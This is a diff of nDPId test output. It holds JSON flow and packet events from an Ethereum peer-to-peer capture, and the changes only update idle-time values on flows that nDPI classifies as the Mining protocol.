-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365701,"flow_last_seen":1578508365701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365701,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1578508365701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365701,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7OLAqAG4i6L\/0t1gdl\/B\/P6FAAAAALAC\/\/8ZigAAAgQFtAEDAwUBAQgKItiYggAAAAAEAgAA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365712,"flow_last_seen":1578508365712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365712,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1578508365712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365712,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlo3AqAG4Ti+Tm91hdl8xKZuYAAAAALAC\/\/+26gAAAgQFtAEDAwUBAQgKItiYjAAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365588,"flow_last_seen":1578508365588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365588,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1578508365588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365588,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVs\/AqAG4p1Z6Mt1edl9ccbjwAAAAALAC\/\/8vAQAAAgQFtAEDAwUBAQgKItiYGgAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365592,"flow_last_seen":1578508365592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365592,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1578508365592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365592,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLq7AqAG4VmvzPt1fdl9sf4vVAAAAALAC\/\/8j6AAAAgQFtAEDAwUBAQgKItiYHgAAAAAEAgAA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1578508365593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAADQGeGsj5egTwKgBuHZf3VbzHyaM6OsJA4ASbvDSjgAAAgQFjAEBBAIBAwMH"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1578508365593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1578508365593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGbHfAqAG4I+XoE91Wdl\/o6wkD8x8mjVAQIABiKQAA"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1578508365619,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365619,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/\/\/rwAAAgQFtAEDAwUBAQgKItiYNwAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1578508365628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGqoHKcBxqwKgBuHZf3U9YWyaeOLFgJqAScSDw0wAAAgQFrAQCCAonH\/CcItiWswEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1578508365628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGkYnAqAG4ynAcat1Pdl84sWAmWFsmn4AQECx\/AQAAAQEICiLYmD8nH\/Cc"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGPLJWa\/M+wKgBuHZf3V\/moIrRbH+L1qAScSBDVwAAAgQFrAQCCApQzL4rItiYHgEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLrrAqAG4VmvzPt1fdl9sf4vW5qCK0oAQECzS7AAAAQEICiLYmEFQzL4r"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGY9OnVnoywKgBuHZf3V5M8kZiXHG48aAScSAfsAAAAgQFrAQCCArTe0haItiYGgEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVtvAqAG4p1Z6Mt1edl9ccbjxTPJGY4AQECyvQQAAAQEICiLYmEHTe0ha"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1578508365688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365688,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwGI8Z82eu0wKgBuHZf3VfxiPe9S9oGI6AScSAoCwAAAgQFrAQCCArI+HIBItiXEAEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1578508365688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365688,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGD9bAqAG4fNnrtN1Xdl9L2gYj8Yj3voAQECy2XAAAAQEICiLYmHfI+HIB"} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365701,"flow_last_seen":1578508365701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365701,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1578508365701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365701,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7OLAqAG4i6L\/0t1gdl\/B\/P6FAAAAALAC\/\/8ZigAAAgQFtAEDAwUBAQgKItiYggAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365712,"flow_last_seen":1578508365712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365712,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1578508365712,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365712,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlo3AqAG4Ti+Tm91hdl8xKZuYAAAAALAC\/\/+26gAAAgQFtAEDAwUBAQgKItiYjAAAAAAEAgAA"} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1521,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1578508365736,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365736,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHpIMAAEARoqnAqAG4b+UAtHZfTtYAsxSK2l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365741,"flow_last_seen":1578508365741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365741,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1578508365741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4nHAqAG4XkQ3ot1idl9YCAHzAAAAALAC\/\/91dwAAAgQFtAEDAwUBAQgKItiYqQAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1578508365742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365742,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG+uaLov\/SwKgBuHZf3WDeocLiwfz+hqAS\/ogDJwAAAgQFrAQCCArjm6OzItiYggEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1578508365742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365742,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7O7AqAG4i6L\/0t1gdl\/B\/P6G3qHC44AQECwgIAAAAQEICiLYmKrjm6Oz"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365751,"flow_last_seen":1578508365751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365751,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1578508365751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365751,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLpXAqAG4I+sl2N1jdl9d8bObAAAAALAC\/\/8KAAAAAgQFtAEDAwUBAQgKItiYsQAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1578508365752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365752,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GqJFOL5ObwKgBuHZf3WHPYyPBMSmbmaAScSA0jAAAAgQFrAQCCApPJ9\/rItiYjAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1578508365753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365753,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlpnAqAG4Ti+Tm91hdl8xKZuZz2MjwoAQECzEHgAAAQEICiLYmLJPJ9\/r"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1578508365776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365776,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADsGM5kj6yXYwKgBuHZf3WOqScTQXfGznKAS\/ohykQAAAgQFrAQCCAo1IQWkItiYsQEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1578508365777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365777,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLqHAqAG4I+sl2N1jdl9d8bOcqknE0YAQECyPmwAAAQEICiLYmMg1IQWk"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365741,"flow_last_seen":1578508365741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365741,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1578508365741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4nHAqAG4XkQ3ot1idl9YCAHzAAAAALAC\/\/91dwAAAgQFtAEDAwUBAQgKItiYqQAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1578508365742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365742,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG+uaLov\/SwKgBuHZf3WDeocLiwfz+hqAS\/ogDJwAAAgQFrAQCCArjm6OzItiYggEDAwc="} 